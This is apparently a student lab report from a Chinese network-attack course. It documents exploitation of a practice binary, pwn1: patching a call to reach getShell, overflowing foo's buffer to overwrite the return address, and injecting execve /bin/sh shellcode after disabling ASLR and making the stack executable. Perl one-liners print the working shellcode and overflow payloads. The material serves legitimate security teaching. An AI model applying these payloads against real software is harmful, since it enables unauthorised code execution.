一、實驗目標

---

本次實踐的對象是一個名為pwn1的linux可執行文件。

該程序正常執行流程是：main調用foo函數,foo函數會簡單回顯任何用戶輸入的字符串。

該程序同時包含另一個代碼片段，getShell，會返回一個可用Shell。正常情況下這個代碼是不會被運行的。我們實踐的目標就是想辦法運行這個代碼片段。我們將學習兩種方法運行這個代碼片段，然后學習如何注入運行任何Shellcode。

---

二、實驗內容

• 1.手工修改可執行文件，改變程序執行流程，直接跳轉到getShell函數。
• 2.利用foo函數的Bof漏洞，構造一個攻擊輸入字符串，覆蓋返回地址，觸發getShell函數。
• 3.注入一個自己制作的shellcode并運行這段shellcode。

三、實驗步驟

1.直接修改程序機器指令，改變程序執行流程

step1.下載目標文件pwn1,反匯編

step2.查看核心代碼，找到main函數調用foo函數對應的匯編指令以及找到getShell函數地址和foo函數地址，計算它倆的地址差為0x14

step3.修改mian函數調用foo函數的機器指令，將其從e8 d7ffffff改為e8 c3fffffff，這是因為call匯編指令的機器碼為e8，d7ffffff為跳轉時需要與eip寄存器相加的偏移量。由于數值存儲方式為小端方式，所以只需要將d7與step2中計算出的地址差0x14做減法，便可得出目標地址為c3ffffff

step4.下載安裝wxhexeditor

root@kali:~# apt-get install wxhexeditor

step5.使用wxhexeditor修改pwn2文件（由pwn1復制而來）后，運行pwn2，會得到shell提示符#，哈哈，實驗1成功。

root@kali:~/20162318zty/exp1# wxhexeditor pwn2

2.通過構造輸入參數，造成BOF攻擊，改變程序執行流

step1. 反匯編，了解程序基本功能

step2.通過反匯編，我們可以發現foo函數存在Buffer overflow漏洞

step3.我們需要確認foo函數讀入的字符串中哪幾個字符會覆蓋返回地址

step4.使用gdb調試，輸入有規律的字符串，例如：1111111122222222333333334444444412345678

step5.通過上圖可以發現輸入的1234被覆蓋到堆棧上的返回地址

step6.由于我們無法通過鍵盤輸入\x7d\x84\x04\x08這樣的16進制值。因此，我們需要生成一個文件input包含字符串（11111111222222223333333344444444\x7d\x84\x04\x08\x0a）其中\x0a代表回車。

step7.將input的輸入，通過管道符“|”，作為pwn1的輸入

root@kali:~/20162318zty/exp1# (cat input; cat) | ./pwn3

3.注入Shellcode并執行

step1. 修改某些設置

root@20162318:~# execstack -s pwn4 //設置堆棧可執行 root@20162318:~# execstack -q pwn4 //查詢文件的堆棧是否可執行 X pwn1 root@20162318:~# more /proc/sys/kernel/randomize_va_space 2 root@20162318:~# echo "0" > /proc/sys/kernel/randomize_va_space //關閉地址隨機化 root@20162318:~# more /proc/sys/kernel/randomize_va_space 0

step2.構造要注入的playload

root@20162318:~/20162318zty/exp1# perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

step3.注入

root@20162318:~/20162318zty/exp1# (cat input_shellcode;cat) | ./pwn4

step4.打開一個新的終端，查看pwn4的進程號

root@20162318:~/20162318zty/exp1# ps -ef | grep pwn4

step5.用gdb來調試pwn4這個進程，設置斷點查看注入buf的內存地址，

step6.修改pwn4的\x4\x3\x2\x1部分，構造新的playload

root@20162318:~/20162318zty/exp1# perl -e 'print "A" x 32;print "\x90\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input_shellcode

step7：將input——shellcode的輸入，通過管道符“|”，作為pwn4的輸入。

四、實驗感想

4.1實驗收獲與感想

本次實踐學習了緩沖區溢出，懂得了緩沖區溢出的原理，并學會了得到shellcode。理論與實際相結合，在一次次失敗中跌倒，卻又一次次站了起來，最終完成了本次實踐。

4.2什么是漏洞？漏洞有什么危害？

• 漏洞：設計者在設計時沒有考慮到的缺陷，卻被攻擊者拿來利用。

• 危害：就拿本次實踐來說，黑客可以利用漏洞來操控你的電腦來竊取數據，修改數據等等，總之，漏洞如果不加以防范的話，就會造成很嚴重的后果。

  五、知識點概述

• NOP：無作用，機器碼90
• JNE：若不相等則跳，機器碼75
• JE：若相等則跳、機器碼74
• JMP：無條件轉移指令。段內直接短轉Jmp short（機器碼：EB），段內直接近轉移Jmp near（機器碼：E9），段內間接轉移Jmp word（機器碼：FF），段間直接(遠)轉移Jmp far（機器碼：EA）
• CMP：比較指令，相當于減法指令。它不保存結果，只是影響相應的標志位(機器碼39)
• 反匯編指令

objdump -d：反匯編指令xxd：為給定的輸入轉換為十六進制的輸出

• 十六進制編程器：wxhexeditor

apt-get install wxhexeditor

轉載于:https://www.cnblogs.com/cs162318/p/10548394.html

總結

以上是生活随笔為你收集整理的20162318 2018-2019-2《网络对抗技术》Exp1 PC平台逆向破解的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。